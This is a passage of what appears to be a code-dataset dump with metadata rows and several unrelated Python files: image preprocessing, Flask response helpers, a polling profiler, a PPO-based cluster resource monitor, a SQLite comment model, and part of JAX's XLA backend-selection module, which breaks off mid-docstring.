hexsha (stringlengths 40-40) | size (int64, 3 to 1.03M) | ext (stringclasses, 10 values) | lang (stringclasses, 1 value) | max_stars_repo_path (stringlengths 3-972) | max_stars_repo_name (stringlengths 6-130) | max_stars_repo_head_hexsha (stringlengths 40-78) | max_stars_repo_licenses (sequencelengths 1-10) | max_stars_count (int64, 1 to 191k, nullable) | max_stars_repo_stars_event_min_datetime (stringlengths 24-24, nullable) | max_stars_repo_stars_event_max_datetime (stringlengths 24-24, nullable) | max_issues_repo_path (stringlengths 3-972) | max_issues_repo_name (stringlengths 6-130) | max_issues_repo_head_hexsha (stringlengths 40-78) | max_issues_repo_licenses (sequencelengths 1-10) | max_issues_count (int64, 1 to 116k, nullable) | max_issues_repo_issues_event_min_datetime (stringlengths 24-24, nullable) | max_issues_repo_issues_event_max_datetime (stringlengths 24-24, nullable) | max_forks_repo_path (stringlengths 3-972) | max_forks_repo_name (stringlengths 6-130) | max_forks_repo_head_hexsha (stringlengths 40-78) | max_forks_repo_licenses (sequencelengths 1-10) | max_forks_count (int64, 1 to 105k, nullable) | max_forks_repo_forks_event_min_datetime (stringlengths 24-24, nullable) | max_forks_repo_forks_event_max_datetime (stringlengths 24-24, nullable) | content (stringlengths 3 to 1.03M) | avg_line_length (float64, 1.13 to 941k) | max_line_length (int64, 2 to 941k) | alphanum_fraction (float64, 0 to 1) |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
56dede1f84776abd68712b1bc66617088bc13c37 | 2,097 | py | Python | images/parse.py | pippinhio/image-recognition | 89569a0d66ae144d2f6e6f2d73a8577ef8b2272b | [
"MIT"
] | 1 | 2022-03-28T08:12:21.000Z | 2022-03-28T08:12:21.000Z | images/parse.py | pippinhio/image-recognition | 89569a0d66ae144d2f6e6f2d73a8577ef8b2272b | [
"MIT"
] | null | null | null | images/parse.py | pippinhio/image-recognition | 89569a0d66ae144d2f6e6f2d73a8577ef8b2272b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Run with e.g. ./parse.py franz
import sys
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
import torchvision
import torchvision.transforms as transforms
def prepare_folder(category):
os.system("rm -rf %s" % category)
os.system("mkdir %s" % category)
def create_images_handwriting(category):
big_image = plt.imread('%s.jpg' % category)
nx = 36 #rows
ny = 41 #columns
count = 0
for i in range(nx):
for j in range(ny):
small_image = big_image[32*i:32*(i+1), 32*j:32*(j+1), :]
file_path = '%s/%06d' % (category, count)
plt.imsave(file_path + '.png', small_image)
os.system('convert %s.png %s.jpg' % (file_path, file_path))
os.system('rm %s.png' % file_path)
count += 1
def transform_tensor_to_numpy(image):
image = image / 2 + 0.5
np_image = image.numpy()
return np.transpose(np_image, (1, 2, 0))
def create_images_torchvision(category, idx):
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
images_set = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform)
images_loader = torch.utils.data.DataLoader(images_set, batch_size=1, shuffle=False, num_workers=2)
count = 0
for data in images_loader:
image, label = data
if label != idx:
continue
file_path = '%s/%06d' % (category, count)
plt.imsave(file_path + '.png', transform_tensor_to_numpy(image[0]))
os.system('convert %s.png %s.jpg' % (file_path, file_path))
os.system('rm %s.png' % file_path)
count += 1
if count == 1476:
break
if __name__ == '__main__':
category = sys.argv[1]
if category in ('franz', 'nina', 'robert_scan', 'franz_scan'):
prepare_folder(category)
create_images_handwriting(category)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
if category in classes:
prepare_folder(category)
create_images_torchvision(category, classes.index(category))
pass
| 28.726027 | 106 | 0.65856 |
601f5518aadb6f8a53de564498a2114336bd08c5 | 357 | py | Python | books/common/response.py | jhgdike/books | dde36f4d419d1b3afb2c87c3509d7672d9c07c75 | [
"MIT"
] | null | null | null | books/common/response.py | jhgdike/books | dde36f4d419d1b3afb2c87c3509d7672d9c07c75 | [
"MIT"
] | 3 | 2022-03-09T03:53:43.000Z | 2022-03-09T03:53:48.000Z | books/common/response.py | jhgdike/books | dde36f4d419d1b3afb2c87c3509d7672d9c07c75 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from flask import jsonify
def json_success(data=''):
resp_json = {
'code': 0,
'data': data,
}
return jsonify(**resp_json)
def json_err(err, msg=''):
resp_json = {
'code': err,
'msg': msg or err.label,
}
return jsonify(**resp_json)
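# Illustrative sketch (not part of the original file): how the two helpers above
# might be used inside a Flask view. The view body and the in-memory BOOKS dict
# are assumptions made up for this example.
def _example_book_view(book_id):
    BOOKS = {1: 'Dune'}  # hypothetical in-memory store
    if book_id not in BOOKS:
        return json_err(404, msg='book not found')
    return json_success(data={'id': book_id, 'title': BOOKS[book_id]})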
| 16.227273 | 39 | 0.565826 |
700510ac2d47dd8e8e96aa087011e4bba4a2d8d0 | 1,489 | py | Python | forceDAQ/_lib/polling_time_profile.py | raunaqbhirangi/pyForceDAQ | a2a41cd7a4a4f0afd178bc5555ba4e0540902d30 | [
"MIT"
] | 8 | 2016-06-27T12:07:14.000Z | 2022-03-29T08:59:44.000Z | forceDAQ/_lib/polling_time_profile.py | raunaqbhirangi/pyForceDAQ | a2a41cd7a4a4f0afd178bc5555ba4e0540902d30 | [
"MIT"
] | 1 | 2020-01-15T20:29:53.000Z | 2020-07-31T17:35:34.000Z | forceDAQ/_lib/polling_time_profile.py | raunaqbhirangi/pyForceDAQ | a2a41cd7a4a4f0afd178bc5555ba4e0540902d30 | [
"MIT"
] | 3 | 2020-01-14T18:31:39.000Z | 2022-03-25T05:56:40.000Z | from .timer import get_time
import numpy as np
class PollingTimeProfile(object):
def __init__(self, timing_range=10):
self._last = None
self._timing_range = timing_range
self._zero_cnt = 0
#self._zero_time_polling_frequency = {}
self.profile_frequency = np.array([0] * (timing_range + 1))
def stop(self):
self._last = None
def update(self, time_ms):
if self._last is not None:
d = time_ms - self._last
if d > self._timing_range:
d = self._timing_range
self.profile_frequency[d] += 1
#if d == 0:
# self._zero_cnt += 1
#elif self._zero_cnt > 0:
# try:
# self._zero_time_polling_frequency[self._zero_cnt] += 1
# except:
# self._zero_time_polling_frequency[self._zero_cnt] = 1
# self._zero_cnt = 0
self._last = time_ms
def tick(self):
self.update(int(1000*get_time()))
@property
def profile_percent(self):
n = np.sum(self.profile_frequency)
return self.profile_frequency / n
def get_profile_str(self):
rtn = str(list(self.profile_frequency)
).replace("[", "").replace("]", "").replace(" ", "")
return "polling profile [{}]".format(rtn)
#@property
#def zero_time_polling_frequency(self):
# return np.array(list(self._zero_time_polling_frequency.items())) | 29.78 | 75 | 0.567495 |
6d25e9ed91a52deabecb134a44b6f9eb4aad016a | 10,641 | py | Python | resources_monitor.py | Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning | eb246ebba160567277c9c1aa226e359f48629dac | [
"MIT"
] | 2 | 2022-03-03T08:52:14.000Z | 2022-03-11T02:27:57.000Z | resources_monitor.py | Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning | eb246ebba160567277c9c1aa226e359f48629dac | [
"MIT"
] | 1 | 2022-03-11T02:51:06.000Z | 2022-03-11T05:02:34.000Z | resources_monitor.py | Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning | eb246ebba160567277c9c1aa226e359f48629dac | [
"MIT"
] | null | null | null | import os
from datetime import datetime
import gym
import numpy as np
import torch
import torch.nn as nn
import xlwt
from torch.distributions import Categorical, MultivariateNormal
def initial_excel():
global worksheet, workbook
# the xlwt library exports the data to Excel; the default character encoding is set to ascii
workbook = xlwt.Workbook(encoding='ascii')
# add a worksheet; the argument is the sheet name
worksheet = workbook.add_sheet('resources usage')
# cell-style settings
# set the column width: 3 is the number of columns, 12 the width, 256 a fixed scale factor
for i in range(3):
worksheet.col(i).width = 256 * 12
# set the cell row height: 25 is the row height, 20 a fixed scale factor
worksheet.row(1).height_mismatch = True
worksheet.row(1).height = 20 * 25
worksheet.write(0, 0, 'time')
worksheet.write(0, 1, 'CPU usage(%)')
worksheet.write(0, 2, 'Memory usage(%)')
worksheet.write(0, 3, 'time1')
worksheet.write(0, 4, 'CPU(%)')
worksheet.write(0, 5, 'Memory(%)')
# save the excel file
workbook.save('data/res_monitor.xls')
print("============================================================================================")
####### initialize environment hyperparameters ######
env_name = "clusterEnv-v0" # name of the custom environment
max_ep_len = 10000 # max timesteps in one episode
total_test_episodes = 1 # total num of testing episodes
################ PPO hyperparameters ################
K_epochs = 80 # update policy for K epochs in one PPO update
eps_clip = 0.2 # clip parameter for PPO
gamma = 0.99 # discount factor
lr_actor = 0.0003 # learning rate for actor network
lr_critic = 0.001 # learning rate for critic network
#####################################################
print("Testing environment name : " + env_name)
env = gym.make(env_name).unwrapped
# state space dimension # action space dimension
state_dim, action_dim = env.return_dim_info()
################### checkpointing ###################
run_num_pretrained = 'resourceTest' #### change this to prevent overwriting weights in same env_name folder
directory = "runs/PPO_preTrained"
if not os.path.exists(directory):
os.makedirs(directory)
directory = directory + '/' + 'clusterEnv-v0' + '/'
if not os.path.exists(directory):
os.makedirs(directory)
checkpoint_path = directory + "PPO_clusterEnv-v0_{}.pth".format(run_num_pretrained)
print("save checkpoint path : " + checkpoint_path)
#####################################################
############# print all hyperparameters #############
print("--------------------------------------------------------------------------------------------")
print("资源用量监视")
print("--------------------------------------------------------------------------------------------")
print("状态空间维数 : ", state_dim)
print("动作空间维数 : ", action_dim)
################################## set device ##################################
print("============================================================================================")
# set device to cpu or cuda
device = torch.device('cpu')
if (torch.cuda.is_available()):
device = torch.device('cuda:0')
torch.cuda.empty_cache()
print("Device set to : " + str(torch.cuda.get_device_name(device)))
else:
print("Device set to : cpu")
print("============================================================================================")
line = 1
flag = 0
################################## PPO Policy ##################################
class RolloutBuffer:
def __init__(self):
self.actions = []
self.states = []
self.logprobs = []
self.rewards = []
self.is_terminals = []
def clear(self):
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
del self.is_terminals[:]
class ActorCritic(nn.Module):
def __init__(self, state_dim, action_dim):
super(ActorCritic, self).__init__()
self.actor = nn.Sequential(
nn.Linear(state_dim, 64),
nn.Tanh(),
nn.Linear(64, 64),
nn.Tanh(),
nn.Linear(64, action_dim),
nn.Softmax(dim=-1)
)
# critic
self.critic = nn.Sequential(
nn.Linear(state_dim, 64),
nn.Tanh(),
nn.Linear(64, 64),
nn.Tanh(),
nn.Linear(64, 1)
)
def forward(self):
raise NotImplementedError
def act(self, state):
# global flag,line
probability = {}
action_probs = self.actor(state)
dist = Categorical(action_probs)
for j in range(action_dim):
probability[j] = dist.probs.detach()[j] # record the current action probability distribution
action = dist.sample()
state, reward, done, info = env.step(action.item() - 1)
while (info[0] == False): # resample
probability[action.item()] = 0
probability_list = [probs for probs in probability.values()]
probs = torch.FloatTensor(probability_list)
dist_copy = Categorical(probs)
for j in range(len(dist_copy.probs)):
probability_list[j] = dist_copy.probs[j].item()
probs = torch.FloatTensor(probability_list)
dist_1 = Categorical(probs)
action = dist_1.sample().to(device) # sample the current action
# if action.item() == 0:
# time, cpu_usage, memory_usage = env.return_res_usage()
# worksheet.write(line, 1, str(100-cpu_usage)+'%')
# worksheet.write(line, 2, str(100-memory_usage)+'%')
# flag = 1
# line += 1
state, reward, done, info = env.step(action.item() - 1) # step receives the action index shifted by -1
action_logprob = dist.log_prob(action).unsqueeze(0)
return action.detach(), action_logprob.detach(), state, reward, done, info
def evaluate(self, state, action):
action_probs = self.actor(state)
dist = Categorical(action_probs)
action_logprobs = dist.log_prob(action)
dist_entropy = dist.entropy()
state_values = self.critic(state)
return action_logprobs, state_values, dist_entropy
class PPO:
def __init__(self, state_dim, action_dim, lr_actor, lr_critic, gamma, K_epochs, eps_clip):
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.buffer = RolloutBuffer() # experience buffer
self.policy = ActorCritic(state_dim, action_dim).to(device) # actor-critic policy
self.optimizer = torch.optim.Adam([
{'params': self.policy.actor.parameters(), 'lr': lr_actor},
{'params': self.policy.critic.parameters(), 'lr': lr_critic}
])
self.policy_old = ActorCritic(state_dim, action_dim).to(device) # old actor-critic policy network
self.policy_old.load_state_dict(self.policy.state_dict())
self.MseLoss = nn.MSELoss()
def select_action(self, state):
with torch.no_grad():
state = torch.FloatTensor(state).to(device)
self.buffer.states.append(state)
action, action_logprob, state, reward, done, info = self.policy_old.act(state)
self.buffer.actions.append(action) # store the action
self.buffer.logprobs.append(action_logprob) # store the action log-probability
return state, reward, done, info
def update(self):
# Monte Carlo estimate of returns
rewards = []
discounted_reward = 0
for reward, is_terminal in zip(reversed(self.buffer.rewards), reversed(self.buffer.is_terminals)):
if is_terminal:
discounted_reward = 0
discounted_reward = reward + (self.gamma * discounted_reward)
rewards.insert(0, discounted_reward)
# Normalizing the rewards
rewards = torch.tensor(rewards, dtype=torch.float32).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-7)
# convert list to tensor
old_states = torch.squeeze(torch.stack(self.buffer.states, dim=0)).detach().to(device)
old_actions = torch.squeeze(torch.stack(self.buffer.actions, dim=0)).detach().to(device)
old_logprobs = torch.squeeze(torch.stack(self.buffer.logprobs, dim=0)).detach().to(device)
# Optimize policy for K epochs
for _ in range(self.K_epochs):
# Evaluating old actions and values
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions)
# match state_values tensor dimensions with rewards tensor
state_values = torch.squeeze(state_values)
# Finding the ratio (pi_theta / pi_theta__old)
ratios = torch.exp(logprobs - old_logprobs.detach())
# Finding Surrogate Loss
advantages = rewards - state_values.detach()
surr1 = ratios * advantages
surr2 = torch.clamp(ratios, 1 - self.eps_clip, 1 + self.eps_clip) * advantages
# final loss of clipped objective PPO
loss = -torch.min(surr1, surr2) + 0.5 * self.MseLoss(state_values, rewards) - 0.01 * dist_entropy
# take gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
# Copy new weights into old policy
self.policy_old.load_state_dict(self.policy.state_dict())
# clear buffer
self.buffer.clear()
def save(self, checkpoint_path):
torch.save(self.policy_old.state_dict(), checkpoint_path)
def load(self, checkpoint_path):
self.policy_old.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage))
self.policy.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage))
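# Illustrative sketch (not part of the original file): a toy version of the
# reward-to-go loop in PPO.update above, with the terminal-state reset omitted.
# With gamma = 0.5, rewards [1, 0, 2] become returns [1.5, 1.0, 2.0].
def _example_discounted_returns(rewards=(1.0, 0.0, 2.0), gamma=0.5):
    returns = []
    discounted = 0.0
    for r in reversed(rewards):
        discounted = r + gamma * discounted  # same recursion as in PPO.update
        returns.insert(0, discounted)
    return returns  # [1.5, 1.0, 2.0] for the defaults above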
def test():
################# testing procedure ################
# initialize a PPO agent
global flag
ppo_agent = PPO(state_dim, action_dim, lr_actor, lr_critic, gamma, K_epochs, eps_clip)
# track total testing time
ppo_agent.load(checkpoint_path)
print("Network ID:", run_num_pretrained)
print('PPO agent has been loaded!')
# GCN test
state = env.reset()
for t in range(1, max_ep_len + 1):
# select action with policy
new_state, reward, done, info = ppo_agent.select_action(state)
# saving reward and is_terminals
# break; if the episode is over
if flag == 1:
time, cpu_usage, memory_usage = env.return_res_usage()
worksheet.write(line - 1, 0, time)
flag = 0
# record resource usage
state = new_state
if done:
print("makesspan:", state[0])
break
ppo_agent.buffer.clear()
# workbook.save('data/res_monitor.xls')
env.close()
if __name__ == '__main__':
# initial_excel()
test()
| 34.436893 | 111 | 0.578235 |
8848857d911b4ab28453bc818aa1aab3174f531c | 2,317 | py | Python | backend/Models/Comment.py | HallWoodZhang/NEUTV_UWP | 6509c79b17c881ecc1247a18f93b256f70b5d077 | [
"MIT"
] | 1 | 2019-03-18T15:37:44.000Z | 2019-03-18T15:37:44.000Z | backend/Models/Comment.py | HallWoodZhang/NEUTV_UWP | 6509c79b17c881ecc1247a18f93b256f70b5d077 | [
"MIT"
] | 3 | 2018-04-16T01:33:30.000Z | 2018-05-04T01:52:00.000Z | backend/Models/Comment.py | HallWoodZhang/NEUTV_UWP | 6509c79b17c881ecc1247a18f93b256f70b5d077 | [
"MIT"
] | 3 | 2018-04-10T09:39:40.000Z | 2018-05-05T02:30:21.000Z | # encoding: utf-8
from __future__ import unicode_literals
import sqlite3
import web
from .Model import Model
class Comment(Model):
def __init__(self, channel_id = u'default', content = u'default', date = u'1111-11-11 00:00:00'):
self.channel_id = channel_id
self.content = content
self.date = date
def insert(self, conn):
try:
conn.execute(
"insert into comment(channel_id, content, date) values(?, ?, ?)",
(self.channel_id, self.content, self.date)
)
conn.commit()
return True
except Exception as e:
print(e)
print('insert comment failed %s, %s, %s', self.channel_id, self.content, self.date)
return False
# static function
@staticmethod
def query_by_period(conn, beg, end, channel_id):
'''
query comments of the given channel whose date lies between beg and end (inclusive),
returned as a list of Comment objects
'''
cache = []
curr = conn.cursor()
sql = 'select channel_id, content, date from comment' +\
' where datetime(date)>=datetime(?) and datetime(?)>=datetime(date) and channel_id=?'
try:
for tmp in curr.execute(sql, (beg, end, channel_id)).fetchall():
cache.append(create_comment_from_tuple(tmp))
except Exception as e:
print(e)
raise AttributeError
finally:
curr.close()
return cache
# static function
@staticmethod
def query_by_period_tuples(conn, beg, end, channel_id):
'''
the static method returns a list of tuples instead of objects
tuples: (channel_id, content, date)
'''
sql = 'select channel_id, content, date from comment' +\
' where datetime(date)>=datetime(?) and datetime(?)>=datetime(date) and channel_id=?'
try:
return conn.execute(sql, (beg, end, channel_id)).fetchall()
except Exception as e:
print(e)
raise AttributeError
return None
def __str__(self):
return self.content
def create_comment_from_args(
channel_id = u'default', content = u'default', date = u'1111-11-11 00:00:00'
):
return Comment(channel_id, content, date)
def create_comment_from_tuple(tp):
return Comment(tp[0], tp[1], tp[2])
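# Illustrative sketch (not part of the original file): a minimal example of wiring
# these helpers together with sqlite3. The database path and the pre-existing
# comment(channel_id, content, date) table are assumptions inferred from the SQL above.
def _example_usage(db_path='comments.db'):
    conn = sqlite3.connect(db_path)
    comment = create_comment_from_args('channel-1', 'nice stream', '2018-05-01 20:00:00')
    comment.insert(conn)
    found = Comment.query_by_period(conn, '2018-05-01 00:00:00',
                                    '2018-05-02 00:00:00', 'channel-1')
    conn.close()
    return found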
| 31.310811 | 101 | 0.587829 |
1a4f232eaa685ad4b14da1056abfb7951f97d169 | 19,098 | py | Python | jax/_src/lib/xla_bridge.py | mkovaxx/jax | 7ce55684356253859928728c82916ac373e283f9 | [
"Apache-2.0"
] | 1 | 2020-01-13T18:55:49.000Z | 2020-01-13T18:55:49.000Z | jax/_src/lib/xla_bridge.py | mkovaxx/jax | 7ce55684356253859928728c82916ac373e283f9 | [
"Apache-2.0"
] | 6 | 2021-11-25T07:58:40.000Z | 2022-01-31T21:15:49.000Z | jax/_src/lib/xla_bridge.py | abattery/jax | 62c7744e68c66fae9faf9d8d00fea8aad4418cf3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interface and utility functions to XLA.
This module wraps the XLA client(s) and builders to standardize their interfaces
and provide some automatic type mapping logic for converting between Numpy and
XLA. There are also a handful of related casting utilities.
"""
from functools import partial, lru_cache
import os
import threading
from typing import Any, Dict, List, Optional, Tuple, Union
import warnings
from absl import logging
# Disable "WARNING: Logging before flag parsing goes to stderr." message
logging._warn_preinit_stderr = 0
import jax._src.lib
from jax._src.config import flags, bool_env
from . import tpu_driver_client
from . import xla_client
from jax._src import util, traceback_util
import numpy as np
iree: Optional[Any]
try:
import jax._src.iree as iree # type: ignore
except ModuleNotFoundError:
iree = None
traceback_util.register_exclusion(__file__)
xops = xla_client.ops
FLAGS = flags.FLAGS
# TODO(phawkins): Remove jax_xla_backend.
flags.DEFINE_string(
'jax_xla_backend', '',
'Deprecated, please use --jax_platforms instead.')
flags.DEFINE_string(
'jax_backend_target', '',
'Either "local" or "rpc:address" to connect to a remote service target.')
# TODO(skye): warn when this is used once we test out --jax_platforms a bit
flags.DEFINE_string(
'jax_platform_name',
os.getenv('JAX_PLATFORM_NAME', '').lower(),
'Deprecated, please use --jax_platforms instead.')
flags.DEFINE_string(
'jax_platforms',
os.getenv('JAX_PLATFORMS', '').lower(),
'Comma-separated list of platform names specifying which platforms jax '
'should attempt to initialize. The first platform in the list that is '
'successfully initialized will be used as the default platform. For '
'example, --jax_platforms=cpu,gpu means that CPU and GPU backends will be '
'initialized, and the CPU backend will be used unless otherwise specified; '
'--jax_platforms=cpu means that only the CPU backend will be initialized. '
'By default, jax will try to initialize all available platforms and will '
'default to GPU or TPU if available, and fallback to CPU otherwise.')
flags.DEFINE_bool(
'jax_disable_most_optimizations',
bool_env('JAX_DISABLE_MOST_OPTIMIZATIONS', False),
'Try not to do much optimization work. This can be useful if the cost of '
'optimization is greater than that of running a less-optimized program.')
def get_compile_options(
num_replicas: int,
num_partitions: int,
device_assignment=None,
use_spmd_partitioning: bool = True,
) -> xla_client.CompileOptions:
"""Returns the compile options to use, as derived from flag values.
Args:
num_replicas: Number of replicas for which to compile.
num_partitions: Number of partitions for which to compile.
device_assignment: Optional tuple of integers indicating the assignment of
logical replicas to physical devices (default inherited from
xla_client.CompileOptions). Must be consistent with `num_replicas` and
`num_partitions`.
use_spmd_partitioning: boolean indicating whether to enable SPMD or MPMD
partitioning in XLA.
"""
compile_options = xla_client.CompileOptions()
compile_options.num_replicas = num_replicas
compile_options.num_partitions = num_partitions
build_options = compile_options.executable_build_options
build_options.use_spmd_partitioning = use_spmd_partitioning
if device_assignment is not None:
logging.vlog(
2,
'get_compile_options: num_replicas=%s num_partitions=%s device_assignment=%s',
num_replicas, num_partitions, device_assignment)
device_assignment = np.array(device_assignment)
# Allow 1D device assignment if num_partitions is 1.
if (device_assignment.ndim == 1) and (num_partitions == 1):
device_assignment = device_assignment[:, None]
if num_replicas != device_assignment.shape[0]:
msg = 'device_assignment does not match num_replicas: {} vs {}.'
raise ValueError(msg.format(device_assignment, num_replicas))
if num_partitions != device_assignment.shape[1]:
msg = 'device_assignment does not match num_partitions: {} vs {}.'
raise ValueError(msg.format(device_assignment, num_partitions))
device_assignment = xla_client.DeviceAssignment.create(device_assignment)
assert device_assignment.replica_count() == num_replicas
assert device_assignment.computation_count() == num_partitions
compile_options.device_assignment = device_assignment
debug_options = compile_options.executable_build_options.debug_options
if jax._src.lib.cuda_path is not None:
debug_options.xla_gpu_cuda_data_dir = jax._src.lib.cuda_path
if FLAGS.jax_disable_most_optimizations:
debug_options.xla_backend_optimization_level = 0
debug_options.xla_llvm_disable_expensive_passes = True
debug_options.xla_test_all_input_layouts = False
return compile_options
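# Illustrative sketch (not part of the original module): how get_compile_options
# might be called for a computation with two replicas and a single partition pinned
# to devices 0 and 1; the device ids here are assumptions.
def _example_compile_options():
    return get_compile_options(
        num_replicas=2,
        num_partitions=1,
        device_assignment=(0, 1),  # a 1-D assignment is accepted when num_partitions == 1
    )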
# Backends
def _make_tpu_driver_client():
if tpu_driver_client is None:
logging.info("Remote TPU is not linked into jax; skipping remote TPU.")
return None
if FLAGS.jax_backend_target is None:
logging.info("No --jax_backend_target was provided; skipping remote TPU.")
return None
return tpu_driver_client.TpuBackend.create(worker=FLAGS.jax_backend_target)
def tpu_client_timer_callback(timer_secs: float):
def _log_warning():
warnings.warn(
f'TPU backend initialization is taking more than {timer_secs} seconds. '
'Did you run your code on all TPU hosts? '
'See https://jax.readthedocs.io/en/latest/multi_process.html '
'for more information.')
# Will log a warning after `timer_secs`.
t = threading.Timer(timer_secs, _log_warning)
t.start()
try:
client = xla_client.make_tpu_client()
finally:
t.cancel()
return client
# Backends, in increasing order of preference.
# We have no particular opinion about how "backends" relate to "devices". For
# example, there could be multiple backends that provide the same kind of
# device.
_backend_factories = {}
_default_backend = None
_backends : Dict[str, Any] = {}
_backends_errors : Dict[str, str] = {}
_backend_lock = threading.Lock()
def register_backend_factory(name, factory, *, priority=0):
with _backend_lock:
if name in _backends:
raise RuntimeError(f"Backend {name} already initialized")
_backend_factories[name] = (factory, priority)
register_backend_factory('interpreter', xla_client.make_interpreter_client,
priority=-100)
register_backend_factory('cpu',
partial(xla_client.make_cpu_client, use_tfrt=True),
priority=0)
register_backend_factory('tpu_driver', _make_tpu_driver_client,
priority=100)
register_backend_factory('gpu', xla_client.make_gpu_client,
priority=200)
register_backend_factory(
'tpu', partial(tpu_client_timer_callback, timer_secs=60.0), priority=300)
if iree is not None:
register_backend_factory("iree", iree.iree_client_factory, priority=-100)
def backends():
global _backends
global _backends_errors
global _default_backend
with _backend_lock:
if _backends:
return _backends
if FLAGS.jax_platforms:
platforms = FLAGS.jax_platforms.split(",")
priorities = range(len(platforms), 0, -1)
platforms_and_priorites = zip(platforms, priorities)
else:
platforms_and_priorites = (
(platform, priority) for platform, (_, priority)
in _backend_factories.items())
default_priority = -1000
for platform, priority in platforms_and_priorites:
try:
backend = _init_backend(platform)
_backends[platform] = backend
if priority > default_priority:
_default_backend = backend
default_priority = priority
except Exception as err:
if platform in ('cpu', 'interpreter'):
# We always expect the CPU and interpreter backends to initialize
# successfully.
raise
else:
# If the backend isn't built into the binary, or if it has no devices,
# we expect a RuntimeError.
logging.info("Unable to initialize backend '%s': %s", platform,
err)
_backends_errors[platform] = str(err)
continue
if _default_backend.platform == "cpu" and FLAGS.jax_platform_name != 'cpu':
logging.warning('No GPU/TPU found, falling back to CPU. '
'(Set TF_CPP_MIN_LOG_LEVEL=0 and rerun for more info.)')
return _backends
def _init_backend(platform):
factory, unused_priority = _backend_factories.get(platform, (None, None))
if factory is None:
raise RuntimeError(f"Unknown backend '{platform}'")
logging.vlog(1, "Initializing backend '%s'" % platform)
backend = factory()
# TODO(skye): consider raising more descriptive errors directly from backend
# factories instead of returning None.
if backend is None:
raise RuntimeError(f"Could not initialize backend '{platform}'")
if backend.device_count() == 0:
raise RuntimeError(f"Backend '{platform}' provides no devices.")
util.distributed_debug_log(("Initialized backend", backend.platform),
("process_index", backend.process_index()),
("device_count", backend.device_count()),
("local_devices", backend.local_devices()))
logging.vlog(1, "Backend '%s' initialized" % platform)
return backend
def _get_backend_uncached(platform=None):
# TODO(mattjj,skyewm): remove this input polymorphism after we clean up how
# 'backend' values are handled
if not isinstance(platform, (type(None), str)):
return platform
bs = backends()
platform = (platform or FLAGS.jax_xla_backend or FLAGS.jax_platform_name
or None)
if platform is not None:
backend = bs.get(platform, None)
if backend is None:
if platform in _backends_errors:
raise RuntimeError(f"Backend '{platform}' failed to initialize: "
f"{_backends_errors[platform]}")
raise RuntimeError(f"Unknown backend {platform}")
return backend
else:
return _default_backend
@lru_cache(maxsize=None) # don't use util.memoize because there is no X64 dependence.
def get_backend(platform=None):
return _get_backend_uncached(platform)
def get_device_backend(device=None):
"""Returns the Backend associated with `device`, or the default Backend."""
if device is not None:
return device.client
return get_backend()
def device_count(backend: Optional[str] = None) -> int:
"""Returns the total number of devices.
On most platforms, this is the same as :py:func:`jax.local_device_count`.
However, on multi-process platforms where different devices are associated
with different processes, this will return the total number of devices across
all processes.
Args:
backend: This is an experimental feature and the API is likely to change.
Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or
``'tpu'``.
Returns:
Number of devices.
"""
return int(get_backend(backend).device_count())
def local_device_count(backend: Optional[str] = None) -> int:
"""Returns the number of devices addressable by this process."""
return int(get_backend(backend).local_device_count())
def devices(backend: Optional[str] = None) -> List[xla_client.Device]:
"""Returns a list of all devices for a given backend.
.. currentmodule:: jaxlib.xla_extension
Each device is represented by a subclass of :class:`Device` (e.g.
:class:`CpuDevice`, :class:`GpuDevice`). The length of the returned list is
equal to ``device_count(backend)``. Local devices can be identified by
comparing :attr:`Device.process_index` to the value returned by
:py:func:`jax.process_index`.
If ``backend`` is ``None``, returns all the devices from the default backend.
The default backend is generally ``'gpu'`` or ``'tpu'`` if available,
otherwise ``'cpu'``.
Args:
backend: This is an experimental feature and the API is likely to change.
Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or
``'tpu'``.
Returns:
List of Device subclasses.
"""
return get_backend(backend).devices()
def default_backend() -> str:
"""Returns the platform name of the default XLA backend."""
return get_backend(None).platform
def local_devices(process_index: Optional[int] = None,
backend: Optional[str] = None,
host_id: Optional[int] = None) -> List[xla_client.Device]:
"""Like :py:func:`jax.devices`, but only returns devices local to a given process.
If ``process_index`` is ``None``, returns devices local to this process.
Args:
process_index: the integer index of the process. Process indices can be
retrieved via ``range(jax.process_count())``.
backend: This is an experimental feature and the API is likely to change.
Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or
``'tpu'``.
Returns:
List of Device subclasses.
"""
if host_id is not None:
warnings.warn(
"The argument to jax.local_devices has been renamed from `host_id` to "
"`process_index`. This alias will eventually be removed; please update "
"your code.")
process_index = host_id
if process_index is None:
process_index = get_backend(backend).process_index()
if not (0 <= process_index < process_count()):
raise ValueError(f"Unknown process_index {process_index}")
return [d for d in devices(backend) if d.process_index == process_index]
def process_index(backend: Optional[str] = None) -> int:
"""Returns the integer process index of this process.
On most platforms, this will always be 0. This will vary on multi-process
platforms though.
Args:
backend: This is an experimental feature and the API is likely to change.
